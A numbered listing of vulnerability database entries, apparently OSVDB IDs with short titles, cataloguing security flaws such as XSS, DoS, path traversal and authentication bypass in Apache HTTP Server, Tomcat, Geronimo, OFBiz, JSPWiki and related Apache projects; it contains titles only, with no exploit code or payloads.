6193| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
6194| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
6195| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
6196| [65054] Apache ActiveMQ Jetty Error Handler XSS
6197| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
6198| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
6199| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
6200| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
6201| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
6202| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
6203| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
6204| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
6205| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
6206| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
6207| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
6208| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
6209| [63895] Apache HTTP Server mod_headers Unspecified Issue
6210| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
6211| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
6212| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
6213| [63140] Apache Thrift Service Malformed Data Remote DoS
6214| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
6215| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
6216| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
6217| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
6218| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
6219| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
6220| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
6221| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
6222| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
6223| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
6224| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
6225| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
6226| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
6227| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
6228| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
6229| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
6230| [60678] Apache Roller Comment Email Notification Manipulation DoS
6231| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
6232| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
6233| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
6234| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
6235| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
6236| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
6237| [60232] PHP on Apache php.exe Direct Request Remote DoS
6238| [60176] Apache Tomcat Windows Installer Admin Default Password
6239| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
6240| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
6241| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
6242| [59944] Apache Hadoop jobhistory.jsp XSS
6243| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
6244| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
6245| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
6246| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
6247| [59019] Apache mod_python Cookie Salting Weakness
6248| [59018] Apache Harmony Error Message Handling Overflow
6249| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
6250| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
6251| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
6252| [59010] Apache Solr get-file.jsp XSS
6253| [59009] Apache Solr action.jsp XSS
6254| [59008] Apache Solr analysis.jsp XSS
6255| [59007] Apache Solr schema.jsp Multiple Parameter XSS
6256| [59006] Apache Beehive select / checkbox Tag XSS
6257| [59005] Apache Beehive jpfScopeID Global Parameter XSS
6258| [59004] Apache Beehive Error Message XSS
6259| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
6260| [59002] Apache Jetspeed default-page.psml URI XSS
6261| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
6262| [59000] Apache CXF Unsigned Message Policy Bypass
6263| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
6264| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
6265| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
6266| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
6267| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
6268| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
6269| [58993] Apache Hadoop browseBlock.jsp XSS
6270| [58991] Apache Hadoop browseDirectory.jsp XSS
6271| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
6272| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
6273| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
6274| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
6275| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
6276| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
6277| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
6278| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
6279| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
6280| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
6281| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
6282| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
6283| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
6284| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
6285| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
6286| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
6287| [58974] Apache Sling /apps Script User Session Management Access Weakness
6288| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
6289| [58931] Apache Geronimo Cookie Parameters Validation Weakness
6290| [58930] Apache Xalan-C++ XPath Handling Remote DoS
6291| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
6292| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
6293| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
6294| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
6295| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
6296| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
6297| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
6298| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
6299| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
6300| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
6301| [58805] Apache Derby Unauthenticated Database / Admin Access
6302| [58804] Apache Wicket Header Contribution Unspecified Issue
6303| [58803] Apache Wicket Session Fixation
6304| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
6305| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
6306| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
6307| [58799] Apache Tapestry Logging Cleartext Password Disclosure
6308| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
6309| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
6310| [58796] Apache Jetspeed Unsalted Password Storage Weakness
6311| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
6312| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
6313| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
6314| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
6315| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
6316| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
6317| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
6318| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
6319| [58775] Apache JSPWiki preview.jsp action Parameter XSS
6320| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
6321| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
6322| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
6323| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
6324| [58770] Apache JSPWiki Group.jsp group Parameter XSS
6325| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
6326| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
6327| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
6328| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
6329| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
6330| [58763] Apache JSPWiki Include Tag Multiple Script XSS
6331| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
6332| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
6333| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
6334| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
6335| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
6336| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
6337| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
6338| [58755] Apache Harmony DRLVM Non-public Class Member Access
6339| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
6340| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
6341| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
6342| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
6343| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
6344| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
6345| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
6346| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
6347| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
6348| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
6349| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
6350| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
6351| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
6352| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
6353| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
6354| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
6355| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
6356| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
6357| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
6358| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
6359| [58725] Apache Tapestry Basic String ACL Bypass Weakness
6360| [58724] Apache Roller Logout Functionality Failure Session Persistence
6361| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
6362| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
6363| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
6364| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
6365| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
6366| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
6367| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
6368| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
6369| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
6370| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
6371| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
6372| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
6373| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
6374| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
6375| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
6376| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
6377| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
6378| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
6379| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
6380| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
6381| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
6382| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
6383| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
6384| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
6385| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
6386| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
6387| [58687] Apache Axis Invalid wsdl Request XSS
6388| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
6389| [58685] Apache Velocity Template Designer Privileged Code Execution
6390| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
6391| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
6392| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
6393| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
6394| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
6395| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
6396| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
6397| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
6398| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
6399| [58667] Apache Roller Database Cleartext Passwords Disclosure
6400| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
6401| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
6402| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
6403| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
6404| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
6405| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
6406| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
6407| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
6408| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
6409| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
6410| [56984] Apache Xerces2 Java Malformed XML Input DoS
6411| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
6412| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
6413| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
6414| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
6415| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
6416| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
6417| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
6418| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
6419| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
6420| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
6421| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
6422| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
6423| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
6424| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
6425| [55056] Apache Tomcat Cross-application TLD File Manipulation
6426| [55055] Apache Tomcat Illegal URL Encoded Password Request Username Enumeration
6427| [55054] Apache Tomcat Java AJP Connector mod_jk Load Balancing Worker Malformed Header Remote DoS
6428| [55053] Apache Tomcat Crafted Request Security Restraint Bypass Arbitrary Content Access
6429| [54733] Apache HTTP Server AllowOverride Directive .htaccess Options Bypass
6430| [54713] razorCMS Security Manager apache User Account Unspecified File Permission Weakness Issue
6431| [54589] Apache Jserv Nonexistent JSP Request XSS
6432| [54122] Apache Struts s:a / s:url Tag href Element XSS
6433| [54093] Apache ActiveMQ Web Console JMS Message XSS
6434| [53932] Apache Geronimo Multiple Admin Function CSRF
6435| [53931] Apache Geronimo /console/portal/Server/Monitoring Multiple Parameter XSS
6436| [53930] Apache Geronimo /console/portal/ URI XSS
6437| [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload
6438| [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload
6439| [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload
6440| [53921] Apache HTTP Server mod_proxy_ajp Cross Thread/Session Information Disclosure
6441| [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
6442| [53574] PHP on Apache .htaccess mbstring.func_overload Setting Cross Hosted Site Behavior Modification
6443| [53381] Apache Tomcat JK Connector Content-Length Header Cross-user Information Disclosure
6444| [53380] Apache Struts Unspecified XSS
6445| [53289] Apache mod_perl Apache::Status /perl-status Unspecified XSS
6446| [53186] Apache HTTP Server htpasswd Predictable Salt Weakness
6447| [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
6448| [52407] Apache Tomcat doRead Method POST Content Information Disclosure
6449| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
6450| [51613] Apache HTTP Server Third-party Module Child Process File Descriptor Leak
6451| [51612] Apache HTTP Server Internal Redirect Handling Infinite Loop DoS
6452| [51468] Apache Jackrabbit Content Repository (JCR) swr.jsp q Parameter XSS
6453| [51467] Apache Jackrabbit Content Repository (JCR) search.jsp q Parameter XSS
6454| [51151] Apache Roller Search Function q Parameter XSS
6455| [50482] PHP with Apache php_value Order Unspecified Issue
6456| [50475] Novell NetWare ApacheAdmin Console Unauthenticated Access
6457| [49734] Apache Struts DefaultStaticContentLoader Class Traversal Arbitrary File Access
6458| [49733] Apache Struts FilterDispatcher Class Traversal Arbitrary File Access
6459| [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
6460| [49062] Apache Tomcat Cross-thread Concurrent Request Variable Overwrite Information Disclosure
6461| [48847] ModSecurity (mod_security) Transformation Caching Unspecified Apache DoS
6462| [48788] Apache Xerces-C++ XML Schema maxOccurs Value XML File Handling DoS
6463| [47474] Apache HTTP Server mod_proxy_ftp Directory Component Wildcard Character XSS
6464| [47464] Apache Tomcat allowLinking / UTF-8 Traversal Arbitrary File Access
6465| [47463] Apache Tomcat RequestDispatcher Traversal Arbitrary File Access
6466| [47462] Apache Tomcat HttpServletResponse.sendError Method Message Argument XSS
6467| [47096] Oracle Weblogic Apache Connector POST Request Overflow
6468| [46382] Frontend Filemanager (air_filemanager) Extension for TYPO3 on Apache Unspecified Arbitrary Code Execution
6469| [46285] TYPO3 on Apache Crafted Filename Upload Arbitrary Command Execution
6470| [46085] Apache HTTP Server mod_proxy ap_proxy_http_process_response() Function Interim Response Forwarding Remote DoS
6471| [45905] Apache Tomcat Host Manager host-manager/html/add name Parameter XSS
6472| [45879] Ragnarok Online Control Panel on Apache Crafted Traversal Authentication Bypass
6473| [45742] Apache HTTP Server on Novell Unspecified Request Directive Internal IP Disclosure
6474| [45740] Apache Derby DropSchemaNode Bind Phase Arbitrary Scheme Statement Dropping
6475| [45599] Apache Derby Lock Table Statement Privilege Requirement Bypass Arbitrary Table Lock
6476| [45585] Apache Derby ACCSEC Command RDBNAM Parameter Cleartext Credential Disclosure
6477| [45584] Apache Derby DatabaseMetaData.getURL Function Cleartext Credential Disclosure
6478| [45420] Apache HTTP Server 403 Error Page UTF-7 Encoded XSS
6479| [44728] PHP Toolkit on Gentoo Linux Interpretation Conflict Apache HTTP Server Local DoS
6480| [44618] Oracle JSP Apache/Jserv Path Translation Traversal Arbitrary JSP File Execution
6481| [44159] Apache HTTP Server Remote Virtual Host Name Disclosure
6482| [43997] Apache-SSL ExpandCert() Function Certificate Handling Arbitrary Environment Variables Manipulation
6483| [43994] suPHP for Apache (mod_suphp) Directory Symlink Local Privilege Escalation
6484| [43993] suPHP for Apache (mod_suphp) Owner Mode Race Condition Symlink Local Privilege Escalation
6485| [43663] Apache HTTP Server Mixed Platform AddType Directive Crafted Request PHP Source Disclosure
6486| [43658] AuthCAS Module (AuthCAS.pm) for Apache HTTP Server SESSION_COOKIE_NAME SQL Injection
6487| [43452] Apache Tomcat HTTP Request Smuggling
6488| [43309] Apache Geronimo LoginModule Login Method Bypass
6489| [43290] Apache JSPWiki Entry Page Attachment Unrestricted File Upload
6490| [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption
6491| [43224] Apache Geronimo on SuSE Linux init Script Symlink Unspecified File/Directory Access
6492| [43189] Apache mod_jk2 Host Header Multiple Fields Remote Overflow
6493| [42937] Apache HTTP Server mod_proxy_balancer balancer-manager Unspecified CSRF
6494| [42341] MOD_PLSQL for Apache Unspecified URL SQL Injection
6495| [42340] MOD_PLSQL for Apache CGI Environment Handling Unspecified Overflow
6496| [42214] Apache HTTP Server mod_proxy_ftp UTF-7 Encoded XSS
6497| [42091] Apache Maven Site Plugin Installation Permission Weakness
6498| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
6499| [42088] Apache Maven Defined Repo Process Listing Password Disclosure
6500| [42087] Apache Maven Site Plugin SSH Deployment Permission Setting Weakness
6501| [42036] Apache HTTP Server MS-DOS Device Request Host OS Disclosure
6502| [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
6503| [41436] Apache Tomcat Native APR Connector Duplicate Request Issue
6504| [41435] Apache Tomcat %5C Cookie Handling Session ID Disclosure
6505| [41434] Apache Tomcat Exception Handling Subsequent Request Information Disclosure
6506| [41400] LimeSurvey save.php Apache Log File PHP Code Injection
6507| [41029] Apache Tomcat Calendar Examples Application cal2.jsp Multiple Parameter CSRF
6508| [41019] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload XSS
6509| [41018] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload CRLF
6510| [40853] Apache Tomcat SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) JSESSIONIDSSO Cookie Security Weakness
6511| [40264] Apache HTTP Server mod_proxy_balancer balancer_handler Function bb Variable Remote DoS
6512| [40263] Apache HTTP Server mod_proxy_balancer balancer-manager Multiple Parameter XSS
6513| [40262] Apache HTTP Server mod_status refresh XSS
6514| [39833] Apache Tomcat JULI Logging Component catalina.policy Security Bypass
6515| [39251] Coppermine Photo Gallery on Apache Multiple File Extension Upload Arbitrary Code Execution
6516| [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure
6517| [39134] Apache mod_imagemap Module Imagemap Unspecified XSS
6518| [39133] Apache mod_imap Module Imagemap File Unspecified XSS
6519| [39035] Apache Tomcat examples/servlet/CookieExample Multiple Parameter XSS
6520| [39003] Apache HTTP Server HTTP Method Header Request Entity Too Large XSS
6521| [39000] Apache Tomcat SendMailServlet sendmail.jsp mailfrom Parameter XSS
6522| [38939] Apache HTTP Server Prefork MPM Module Array Modification Local DoS
6523| [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
6524| [38662] Apache Geronimo SQLLoginModule Nonexistent User Authentication Bypass
6525| [38661] Apache Geronimo MEJB Unspecified Authentication Bypass
6526| [38641] Apache HTTP Server mod_mem_cache recall_headers Function Information Disclosure
6527| [38640] Apache HTTP Server suexec Document Root Unauthorized Operations
6528| [38639] Apache HTTP Server suexec Multiple Symlink Privilege Escalation
6529| [38636] Apache HTTP Server mod_autoindex.c P Variable UTF-7 Charset XSS
6530| [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
6531| [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
6532| [37079] Apache HTTP Server mod_cache cache_util.c Malformed Cache-Control Header DoS
6533| [37071] Apache Tomcat Cookie Handling Session ID Disclosure
6534| [37070] Apache Tomcat Cookie Handling Quote Delimiter Session ID Disclosure
6535| [37052] Apache HTTP Server mod_status mod_status.c Unspecified XSS
6536| [37051] Apache HTTP Server mod_proxy modules/proxy/proxy_util.c Crafted Header Remote DoS
6537| [37050] Apache HTTP Server Prefork MPM Module Crafted Code Sequence Local DoS
6538| [36417] Apache Tomcat Host Manager Servlet html/add Action aliases Parameter XSS
6539| [36377] Apache MyFaces Tomahawk JSF Application autoscroll Multiple Script XSS
6540| [36080] Apache Tomcat JSP Examples Crafted URI XSS
6541| [36079] Apache Tomcat Manager Uploaded Filename XSS
6542| [34888] Apache Tomcat Example Calendar Application cal2.jsp time Parameter XSS
6543| [34887] Apache Tomcat implicit-objects.jsp Crafted Header XSS
6544| [34885] Apache Tomcat on IIS Servlet Engine MS-DOS Device Request DoS
6545| [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure
6546| [34883] Apache Tomcat Crafted JSP File Request Path Disclosure
6547| [34882] Apache Tomcat Default SSL Ciphersuite Configuration Weakness
6548| [34881] Apache Tomcat Malformed Accept-Language Header XSS
6549| [34880] Apache Tomcat HTTP/1.1 Connector NULL Byte Request JSP Source Disclosure
6550| [34879] Apache Tomcat examples/jsp2/jspx/textRotate.jspx XSS
6551| [34878] Apache Tomcat examples/jsp2/el/implicit-objects.jsp XSS
6552| [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
6553| [34876] Apache HTTP Server ScriptAlias CGI Source Disclosure
6554| [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
6555| [34874] Apache Tomcat AJP Connector mod_jk ajp_process_callback Remote Memory Disclosure
6556| [34873] Apache Stats Variable Extraction _REQUEST Ssuperglobal Array Overwrite
6557| [34872] Apache HTTP Server suexec User/Group Combination Weakness Local Privilege Escalation
6558| [34769] Apache Tomcat w/ Proxy Module Double Encoded Traversal Arbitrary File Access
6559| [34541] mod_perl for Apache HTTP Server RegistryCooker.pm PATH_INFO Crafted URI Remote DoS
6560| [34540] mod_perl for Apache HTTP Server PerlRun.pm PATH_INFO Crafted URI Remote DoS
6561| [34398] Apache Tomcat mod_jk Invalid Chunked Encoded Body Information Disclosure
6562| [34154] Apache Axis Nonexistent Java Web Service Path Disclosure
6563| [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
6564| [33816] Apache HTTP Server on Debian Linux TTY Local Privilege Escalation
6565| [33456] Apache HTTP Server Crafted TCP Connection Range Header DoS
6566| [33346] Avaya Multiple Products Apache Tomcat Port Weakness
6567| [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
6568| [32978] Apache Java Mail Enterprise Server (JAMES) POP3Server Log File Plaintext Password Disclosure
6569| [32724] Apache mod_python _filter_read Freed Memory Disclosure
6570| [32723] Apache Tomcat semicolon Crafted Filename Request Forced Directory Listing
6571| [32396] Apache Open For Business Project (OFBiz) Ecommerce Component Forum Implementation Message Body XSS
6572| [32395] Apache Open For Business Project (OFBiz) Ecommerce Component Form Field Manipulation Privilege Escalation
6573| [30354] Linux Subversion libapache2-svn Search Path Subversion Local Privilege Escalation
6574| [29603] PHP ini_restore() Apache httpd.conf Options Bypass
6575| [29536] Apache Tcl mod_tcl set_var Function Remote Format String
